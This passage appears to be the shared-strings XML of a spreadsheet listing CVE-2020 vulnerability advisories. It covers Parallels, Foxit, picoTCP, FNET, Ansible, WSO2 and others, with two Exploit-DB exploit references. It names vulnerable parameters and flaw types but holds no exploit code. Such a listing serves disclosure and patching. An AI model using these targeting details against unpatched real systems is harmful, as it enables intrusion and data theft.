    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.4. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the handling of network packets. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the hypervisor. Was ZDI-CAN-11253.</t>
  </si>
  <si>
    <t>CVE-2020-17398</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose information on affected installations of Parallels Desktop 15.1.4. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the prl_hypervisor kext. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel. Was ZDI-CAN-11302.</t>
  </si>
  <si>
    <t>CVE-2020-17399</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.4. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the prl_hypervisor kext. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the kernel. Was ZDI-CAN-11303.</t>
  </si>
  <si>
    <t>CVE-2020-1740</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes "ansible-vault edit", another user on the same computer can read the old and new secret, as it is created in a temporary file with mkstemp and the returned file descriptor is closed and the method write_data is called to write the existing secret in the file. This method will delete the file before recreating it insecurely. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-17400</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.4. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the prl_hypervisor kext. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the hypervisor. Was ZDI-CAN-11304.</t>
  </si>
  <si>
    <t>CVE-2020-17401</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive informations on affected installations of Parallels Desktop 15.1.4. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the VGA virtual device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated array. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute code in the context of the hypervisor. Was ZDI-CAN-11363.</t>
  </si>
  <si>
    <t>CVE-2020-17402</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.4 (47270). An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the prl_hypervisor kext. By examining a log file, an attacker can disclose a memory address. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute code in the context of the kernel. Was ZDI-CAN-11063.</t>
  </si>
  <si>
    <t>CVE-2020-17403</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handling of PSD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11003.</t>
  </si>
  <si>
    <t>CVE-2020-17404</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handling of PSD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11191.</t>
  </si>
  <si>
    <t>CVE-2020-17405</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Senstar Symphony 7.3.2.2. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SSOAuth process. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10980.</t>
  </si>
  <si>
    <t>CVE-2020-17406</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microhard Bullet-LTE prior to v1.2.0-r1112. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of the ping parameter provided to tools.sh. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-10595.</t>
  </si>
  <si>
    <t>CVE-2020-17407</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microhard Bullet-LTE prior to v1.2.0-r1112. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of authentication headers. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-10596.</t>
  </si>
  <si>
    <t>CVE-2020-17408</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of NEC ExpressCluster 4.1. Authentication is not required to exploit this vulnerability. The specific flaw exists within the clpwebmc executable. Due to the improper restriction of XML External Entity (XXE) references, a specially-crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM. Was ZDI-CAN-10801.</t>
  </si>
  <si>
    <t>CVE-2020-17409</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR R6120, R6080, R6260, R6220, R6020, JNR3210, and WNR2020 routers with firmware 1.0.66. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mini_httpd service, which listens on TCP port 80 by default. The issue results from incorrect string matching logic when accessing protected pages. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-10754.</t>
  </si>
  <si>
    <t>CVE-2020-1741</t>
  </si>
  <si>
    <t>A flaw was found in openshift-ansible. OpenShift Container Platform (OCP) 3.11 is too permissive in the way it specified CORS allowed origins during installation. An attacker, able to man-in-the-middle the connection between the user's browser and the openshift console, could use this flaw to perform a phishing attack. The main threat from this vulnerability is data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-17410</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of GIF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11135.</t>
  </si>
  <si>
    <t>CVE-2020-17411</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PhantomPDF 10.0.0.35798.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code in the context of the current process. Was ZDI-CAN-11190.</t>
  </si>
  <si>
    <t>CVE-2020-17412</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.0.0.35798.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write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11224.</t>
  </si>
  <si>
    <t>CVE-2020-17413</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in PDF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11226.</t>
  </si>
  <si>
    <t>CVE-2020-17414</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Foxit Reader 10.0.0.35798. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of the configuration files used by the Foxit Reader Update Service. The issue results from incorrect permissions set on a resource used by the service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Was ZDI-CAN-11229.</t>
  </si>
  <si>
    <t>CVE-2020-17415</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Foxit PhantomPDF 10.0.0.35798. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of the configuration files used by the Foxit PhantomPDF Update Service. The issue results from incorrect permissions set on a resource used by the service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Was ZDI-CAN-11308.</t>
  </si>
  <si>
    <t>CVE-2020-17416</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG2000 images. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11497.</t>
  </si>
  <si>
    <t>CVE-2020-17417</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.0.1.35811. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11657.</t>
  </si>
  <si>
    <t>CVE-2020-17418</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handling of EZIX files. A crafted id in a channel element can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11197.</t>
  </si>
  <si>
    <t>CVE-2020-17419</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handling of NEF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11192.</t>
  </si>
  <si>
    <t>CVE-2020-1742</t>
  </si>
  <si>
    <t>An insecure modification vulnerability flaw was found in containers using nmstate/kubernetes-nmstate-handler. An attacker with access to the container could use this flaw to modify /etc/passwd and escalate their privileges. Versions before kubernetes-nmstate-handler-container-v2.3.0-30 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-17420</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of NEF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11193.</t>
  </si>
  <si>
    <t>CVE-2020-17421</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handling of NEF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11194.</t>
  </si>
  <si>
    <t>CVE-2020-17422</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of EPS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11195.</t>
  </si>
  <si>
    <t>CVE-2020-17423</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handling of ARW files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11196.</t>
  </si>
  <si>
    <t>CVE-2020-17424</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parsing of EZI files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11247.</t>
  </si>
  <si>
    <t>CVE-2020-17425</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parsing of EPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11259.</t>
  </si>
  <si>
    <t>CVE-2020-17426</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handling of CR2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11230.</t>
  </si>
  <si>
    <t>CVE-2020-17427</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processing of NEF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11334.</t>
  </si>
  <si>
    <t>CVE-2020-17428</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of CMP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11336.</t>
  </si>
  <si>
    <t>CVE-2020-17429</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of CMP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11337.</t>
  </si>
  <si>
    <t>CVE-2020-17430</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parsing of CR2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11332.</t>
  </si>
  <si>
    <t>CVE-2020-17431</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parsing of CR2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11333.</t>
  </si>
  <si>
    <t>CVE-2020-17432</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CR2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11335.</t>
  </si>
  <si>
    <t>CVE-2020-17433</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CMP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11356.</t>
  </si>
  <si>
    <t>CVE-2020-17434</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ARW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11357.</t>
  </si>
  <si>
    <t>CVE-2020-17435</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CR2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11358.</t>
  </si>
  <si>
    <t>CVE-2020-17436</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CMP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11432.</t>
  </si>
  <si>
    <t>CVE-2020-17437</t>
  </si>
  <si>
    <t>An issue was discovered in uIP 1.0, as used in Contiki 3.0 and other products. When the Urgent flag is set in a TCP packet, and the stack is configured to ignore the urgent data, the stack attempts to use the value of the Urgent pointer bytes to separate the Urgent data from the normal data, by calculating the offset at which the normal data should be present in the global buffer. However, the length of this offset is not checked; therefore, for large values of the Urgent pointer bytes, the data pointer can point to memory that is way beyond the data buffer in uip_process in uip.c.</t>
  </si>
  <si>
    <t>CVE-2020-17438</t>
  </si>
  <si>
    <t>An issue was discovered in uIP 1.0, as used in Contiki 3.0 and other products. The code that reassembles fragmented packets fails to properly validate the total length of an incoming packet specified in its IP header, as well as the fragmentation offset value specified in the IP header. By crafting a packet with specific values of the IP header length and the fragmentation offset, attackers can write into the .bss section of the program (past the statically allocated buffer that is used for storing the fragmented data) and cause a denial of service in uip_reass() in uip.c, or possibly execute arbitrary code on some target architectures.</t>
  </si>
  <si>
    <t>CVE-2020-17439</t>
  </si>
  <si>
    <t>An issue was discovered in uIP 1.0, as used in Contiki 3.0 and other products. The code that parses incoming DNS packets does not validate that the incoming DNS replies match outgoing DNS queries in newdata() in resolv.c. Also, arbitrary DNS replies are parsed if there was any outgoing DNS query with a transaction ID that matches the transaction ID of an incoming reply. Provided that the default DNS cache is quite small (only four records) and that the transaction ID has a very limited set of values that is quite easy to guess, this can lead to DNS cache poisoning.</t>
  </si>
  <si>
    <t>CVE-2020-1744</t>
  </si>
  <si>
    <t>A flaw was found in keycloak before version 9.0.1. When configuring an Conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle this events.</t>
  </si>
  <si>
    <t>CVE-2020-17440</t>
  </si>
  <si>
    <t>An issue was discovered in uIP 1.0, as used in Contiki 3.0 and other products. The code that parses incoming DNS packets does not validate that domain names present in the DNS responses have '\0' termination. This results in errors when calculating the offset of the pointer that jumps over domain name bytes in DNS response packets when a name lacks this termination, and eventually leads to dereferencing the pointer at an invalid/arbitrary address, within newdata() and parse_name() in resolv.c.</t>
  </si>
  <si>
    <t>CVE-2020-17441</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP 1.7.0. The code for processing the IPv6 headers does not validate whether the IPv6 payload length field is equal to the actual size of the payload, which leads to an Out-of-Bounds read during the ICMPv6 checksum calculation, resulting in either Denial-of-Service or Information Disclosure. This affects pico_ipv6_extension_headers and pico_checksum_adder (in pico_ipv6.c and pico_frame.c).</t>
  </si>
  <si>
    <t>CVE-2020-17442</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP 1.7.0. The code for parsing the hop-by-hop IPv6 extension headers does not validate the bounds of the extension header length value, which may result in Integer Wraparound. Therefore, a crafted extension header length value may cause Denial-of-Service because it affects the loop in which the extension headers are parsed in pico_ipv6_process_hopbyhop() in pico_ipv6.c.</t>
  </si>
  <si>
    <t>CVE-2020-17443</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP 1.7.0. The code for creating an ICMPv6 echo replies doesn't check whether the ICMPv6 echo request packet's size is shorter than 8 bytes. If the size of the incoming ICMPv6 request packet is shorter than this, the operation that calculates the size of the ICMPv6 echo replies has an integer wrap around, leading to memory corruption and, eventually, Denial-of-Service in pico_icmp6_send_echoreply_not_frag in pico_icmp6.c.</t>
  </si>
  <si>
    <t>CVE-2020-17444</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP 1.7.0. The routine for processing the next header field (and deducing whether the IPv6 extension headers are valid) doesn't check whether the header extension length field would overflow. Therefore, if it wraps around to zero, iterating through the extension headers will not increment the current data pointer. This leads to an infinite loop and Denial-of-Service in pico_ipv6_check_headers_sequence() in pico_ipv6.c.</t>
  </si>
  <si>
    <t>CVE-2020-17445</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP 1.7.0. The code for processing the IPv6 destination options does not check for a valid length of the destination options header. This results in an Out-of-Bounds Read, and, depending on the memory protection mechanism, this may result in Denial-of-Service in pico_ipv6_process_destopt() in pico_ipv6.c.</t>
  </si>
  <si>
    <t>CVE-2020-17446</t>
  </si>
  <si>
    <t>asyncpg before 0.21.0 allows a malicious PostgreSQL server to trigger a crash or execute arbitrary code (on a database client) via a crafted server response, because of access to an uninitialized pointer in the array data decoder.</t>
  </si>
  <si>
    <t>CVE-2020-17448</t>
  </si>
  <si>
    <t>Telegram Desktop through 2.1.13 allows a spoofed file type to bypass the Dangerous File Type Execution protection mechanism, as demonstrated by use of the chat window with a filename that lacks an extension.</t>
  </si>
  <si>
    <t>CVE-2020-17449</t>
  </si>
  <si>
    <t>PHP-Fusion 9.03 allows XSS via the error_log file.</t>
  </si>
  <si>
    <t>CVE-2020-1745</t>
  </si>
  <si>
    <t>A file inclusion vulnerability was found in the AJP connector enabled with a default AJP configuration port of 8009 in Undertow version 2.0.29.Final and before and was fixed in 2.0.30.Final. A remote, unauthenticated attacker could exploit this vulnerability to read web application files from a vulnerable server. In instances where the vulnerable server allows file uploads, an attacker could upload malicious JavaServer Pages (JSP) code within a variety of file types and trigger this vulnerability to gain remote code execution.</t>
  </si>
  <si>
    <t>exploits/hardware/remote/50821.py</t>
  </si>
  <si>
    <t>Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)</t>
  </si>
  <si>
    <t>2022-03-11</t>
  </si>
  <si>
    <t>CVE-2020-17450</t>
  </si>
  <si>
    <t>PHP-Fusion 9.03 allows XSS on the preview page.</t>
  </si>
  <si>
    <t>CVE-2020-17451</t>
  </si>
  <si>
    <t>flatCore before 1.5.7 allows XSS by an admin via the acp/acp.php?tn=pages&amp;sub=edit&amp;editpage=1 page_linkname, page_title, page_content, or page_extracontent parameter, or the acp/acp.php?tn=system&amp;sub=sys_pref prefs_pagename, prefs_pagetitle, or prefs_pagesubtitle parameter.</t>
  </si>
  <si>
    <t>CVE-2020-17452</t>
  </si>
  <si>
    <t>flatCore before 1.5.7 allows upload and execution of a .php file by an admin.</t>
  </si>
  <si>
    <t>CVE-2020-17453</t>
  </si>
  <si>
    <t>WSO2 Management Console through 5.10 allows XSS via the carbon/admin/login.jsp msgId parameter.</t>
  </si>
  <si>
    <t>CVE-2020-17454</t>
  </si>
  <si>
    <t>WSO2 API Manager 3.1.0 and earlier has reflected XSS on the "publisher" component's admin interface. More precisely, it is possible to inject an XSS payload into the owner POST parameter, which does not filter user inputs. By putting an XSS payload in place of a valid Owner Name, a modal box appears that writes an error message concatenated to the injected payload (without any form of data encoding). This can also be exploited via CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-17456</t>
  </si>
  <si>
    <t>SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page.</t>
  </si>
  <si>
    <t>CVE-2020-17457</t>
  </si>
  <si>
    <t>Fujitsu ServerView Suite iRMC before 9.62F allows XSS. An authenticated attacker can store an XSS payload in the PSCU_FILE_INIT field of a Save Configuration XML document. The payload is triggered in the HTTP error response pages.</t>
  </si>
  <si>
    <t>CVE-2020-17458</t>
  </si>
  <si>
    <t>A post-authenticated stored XSS was found in MultiUx v.3.1.12.0 via the /multiux/SaveMailbox LastName field.</t>
  </si>
  <si>
    <t>CVE-2020-1746</t>
  </si>
  <si>
    <t>A flaw was found in the Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when the ldap_attr and ldap_entry community modules are used. The issue discloses the LDAP bind password to stdout or a log file if a playbook task is written using the bind_pw in the parameters field. The highest threat from this vulnerability is data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-17462</t>
  </si>
  <si>
    <t>CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar files, a related issue to CVE-2017-16798.</t>
  </si>
  <si>
    <t>CVE-2020-17463</t>
  </si>
  <si>
    <t>FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.</t>
  </si>
  <si>
    <t>CVE-2020-17465</t>
  </si>
  <si>
    <t>Dashboards and progressiveProfileForms in ForgeRock Identity Manager before 7.0.0 are vulnerable to stored XSS. The vulnerability affects versions 6.5.0.4, 6.0.0.6.</t>
  </si>
  <si>
    <t>CVE-2020-17466</t>
  </si>
  <si>
    <t>Turcom TRCwifiZone through 2020-08-10 allows authentication bypass by visiting manage/control.php and ignoring 302 Redirect responses.</t>
  </si>
  <si>
    <t>CVE-2020-17467</t>
  </si>
  <si>
    <t>An issue was discovered in FNET through 4.6.4. The code for processing the hostname from an LLMNR request doesn't check for '\0' termination. Therefore, the deduced length of the hostname doesn't reflect the correct length of the actual data. This may lead to Information Disclosure in _fnet_llmnr_poll in fnet_llmnr.c during a response to a malicious request of the DNS class IN.</t>
  </si>
  <si>
    <t>CVE-2020-17468</t>
  </si>
  <si>
    <t>An issue was discovered in FNET through 4.6.4. The code for processing the hop-by-hop header (in the IPv6 extension headers) doesn't check for a valid length of an extension header, and therefore an out-of-bounds read can occur in _fnet_ip6_ext_header_handler_options in fnet_ip6.c, leading to Denial-of-Service.</t>
  </si>
  <si>
    <t>CVE-2020-17469</t>
  </si>
  <si>
    <t>An issue was discovered in FNET through 4.6.4. The code for IPv6 fragment reassembly tries to access a previous fragment starting from a network incoming fragment that still doesn't have a reference to the previous one (which supposedly resides in the reassembly list). When faced with an incoming fragment that belongs to a non-empty fragment list, IPv6 reassembly must check that there are no empty holes between the fragments: this leads to an uninitialized pointer dereference in _fnet_ip6_reassembly in fnet_ip6.c, and causes Denial-of-Service.</t>
  </si>
  <si>
    <t>CVE-2020-1747</t>
  </si>
  <si>
    <t>A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.</t>
  </si>
  <si>
    <t>CVE-2020-17470</t>
  </si>
  <si>
    <t>An issue was discovered in FNET through 4.6.4. The code that initializes the DNS client interface structure does not set sufficiently random transaction IDs (they are always set to 1 in _fnet_dns_poll in fnet_dns.c). This significantly simplifies DNS cache poisoning attacks.</t>
  </si>
  <si>
    <t>CVE-2020-17473</t>
  </si>
  <si>
    <t>Lack of mutual authentication in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to obtain a long-lasting token by impersonating the server.</t>
  </si>
  <si>
    <t>CVE-2020-17474</t>
  </si>
  <si>
    <t>A token-reuse vulnerability in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to create arbitrary new users, elevate users to administrators, delete users, and download user faces from the database.</t>
  </si>
  <si>
    <t>CVE-2020-17475</t>
  </si>
  <si>
    <t>Lack of authentication in the network relays used in MEGVII Koala 2.9.1-c3s allows attackers to grant physical access to anyone by sending packet data to UDP port 5000.</t>
  </si>
  <si>
    <t>CVE-2020-17476</t>
  </si>
  <si>
    <t>Mibew Messenger before 3.2.7 allows XSS via a crafted user name.</t>
  </si>
  <si>
    <t>CVE-2020-17478</t>
  </si>
  <si>
    <t>ECDSA/EC/Point.pm in Crypt::Perl before 0.33 does not properly consider timing attacks against the EC point multiplication algorithm.</t>
  </si>
  <si>
    <t>CVE-2020-17479</t>
  </si>
  <si>
    <t>jpv (aka Json Pattern Validator) before 2.2.2 does not properly validate input, as demonstrated by a corrupted array.</t>
  </si>
  <si>
    <t>CVE-2020-1748</t>
  </si>
  <si>
    <t>A flaw was found in all supported versions before wildfly-elytron-1.6.8.Final-redhat-00001, where the WildFlySecurityManager checks were bypassed when using custom security managers, resulting in an improper authorization. This flaw leads to information exposure by unauthenticated access to secure resources.</t>
  </si>
  <si>
    <t>CVE-2020-17480</t>
  </si>
  <si>
    <t>TinyMCE before 4.9.7 and 5.x before 5.1.4 allows XSS in the core parser, the paste plugin, and the visualchars plugin by using the clipboard or APIs to insert content into the editor.</t>
  </si>
  <si>
    <t>CVE-2020-17482</t>
  </si>
  <si>
    <t>An issue has been found in PowerDNS Authoritative Server before 4.3.1 where an authorized user with the ability to insert crafted records into a zone might be able to leak the content of uninitialized memory.</t>
  </si>
  <si>
    <t>CVE-2020-17487</t>
  </si>
  <si>
    <t>radare2 4.5.0 misparses signature information in PE files, causing a segmentation fault in r_x509_parse_algorithmidentifier in libr/util/x509.c. This is due to a malformed object identifier in IMAGE_DIRECTORY_ENTRY_SECURITY.</t>
  </si>
  <si>
    <t>CVE-2020-17489</t>
  </si>
  <si>
    <t>An issue was discovered in certain configurations of GNOME gnome-shell through 3.36.4. When logging out of an account, the password box from the login dialog reappears with the password still visible. If the user had decided to have the password shown in cleartext at login time, it is then visible for a brief moment upon a logout. (If the password were never shown in cleartext, only the password length is revealed.)</t>
  </si>
  <si>
    <t>CVE-2020-1749</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel's implementation of some networking protocols in IPsec, such as VXLAN and GENEVE tunnels over IPv6. When an encrypted tunnel is created between two hosts, the kernel isn't correctly routing tunneled data over the encrypted link; rather sending the data unencrypted. This would allow anyone in between the two endpoints to read the traffic unencrypted. The main threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-17490</t>
  </si>
  <si>
    <t>The TLS module within SaltStack Salt through 3002 creates certificates with weak file permissions.</t>
  </si>
  <si>
    <t>CVE-2020-17494</t>
  </si>
  <si>
    <t>Untangle Firewall NG before 16.0 uses MD5 for passwords.</t>
  </si>
  <si>
    <t>CVE-2020-17495</t>
  </si>
  <si>
    <t>django-celery-results through 1.2.1 stores task results in the database. Among the data it stores are the variables passed into the tasks. The variables may contain sensitive cleartext information that does not belong unencrypted in the database.</t>
  </si>
  <si>
    <t>CVE-2020-17496</t>
  </si>
  <si>
    <t>vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.</t>
  </si>
  <si>
    <t>CVE-2020-17497</t>
  </si>
  <si>
    <t>eapol.c in iNet wireless daemon (IWD) through 1.8 allows attackers to trigger a PTK reinstallation by retransmitting EAPOL Msg4/4.</t>
  </si>
  <si>
    <t>CVE-2020-17498</t>
  </si>
  <si>
    <t>In Wireshark 3.2.0 to 3.2.5, the Kafka protocol dissector could crash. This was addressed in epan/dissectors/packet-kafka.c by avoiding a double free during LZ4 decompression.</t>
  </si>
  <si>
    <t>CVE-2020-1750</t>
  </si>
  <si>
    <t>A flaw was found in the machine-config-operator that causes an OpenShift node to become unresponsive when a container consumes a large amount of memory. An attacker could use this flaw to deny access to schedule new pods in the OpenShift cluster. This was fixed in openshift/machine-config-operator 4.4.3, openshift/machine-config-operator 4.3.25, openshift/machine-config-operator 4.2.36.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48744.py</t>
  </si>
  <si>
    <t>Artica Proxy 4.3.0 - Authentication Bypass</t>
  </si>
  <si>
    <t>2020-08-13</t>
  </si>
  <si>
    <t>CVE-2020-17500</t>
